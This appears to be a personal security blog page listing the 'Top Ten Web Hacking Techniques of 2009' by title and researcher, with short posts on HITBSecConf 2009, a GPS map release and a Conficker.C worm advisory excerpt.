Xanda's Blog !~!

Top Ten Web Hacking Techniques of 2009 (Official)

Top Ten Web Hacking Techniques of 2009!

1. Creating a rogue CA certificate
Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger

2. HTTP Parameter Pollution (HPP)
Luca Carettoni, Stefano diPaola

3. Flickr’s API Signature Forgery Vulnerability (MD5 extension attack)
Thai Duong and Juliano Rizzo

4. Cross-domain search timing
Chris Evans

5. Slowloris HTTP DoS
Robert Hansen, (additional credit for earlier discovery to Adrian Ilarion Ciobanu & Ivan Ristic – “Programming Model Attacks” section of Apache Security for describing the attack, but did not produce a tool)

6. Microsoft IIS 0-Day Vulnerability Parsing Files (semi‐colon bug)
Soroush Dalili

7. Exploiting unexploitable XSS
Stephen Sclafani

8. Our Favorite XSS Filters and how to Attack them
Eduardo Vela (sirdarckcat), David Lindsay (thornmaker)

9. RFC1918 Caching Security Issues
Robert Hansen

10. DNS Rebinding (3-part series Persistent Cookies, Scraping & Spamming, and Session Fixation)
Robert Hansen

[source: Jeremiah Grossman]

HITBSecConf 2009

First of all, congrats to d3ck4, crayon and the team..

Hurm.. HITBSecConf 2009.. Personally, nothing much.. I was disappointed with Mark Dowd and Saumil’s presentation (yeah.. maybe i’m expecting too much) but somehow Wes Brown, METASM and Google’s guy fixed my day..

Enjoy spending some time outside of the office, meeting people (and old friends), (_NOT_ really) learn new stuff..

Anyway.. Itu lah apa yang berlaku..

Malsing Maps for Mapking G10/2007, R12 and PC is released

Malsing Maps for Mapking G10/2007, R12 and PC is now updated [18 Jul 2009] and ready to be downloaded HERE

1st April 2009 – Selamat Menyambut Conficker.C Al-Mubarak

has been observing increasing trend of IT security related discussion and information sharing about a worm variant called Conficker.C on the internet. It is expected that the enhanced version of previous worm variant Conficker.A and Conficker.B will trigger on the coming 1st of April. Security researchers believe, the latest outbreak of Conficker variant C began first spreading at roughly 6 p.m. PST, 4 March 2009 (5 March UTC). would like to highlight that this is not a new outbreak nor a new piece of malware. Removal and mitigation strategies were highlighted in our previous advisory.

[">Read more]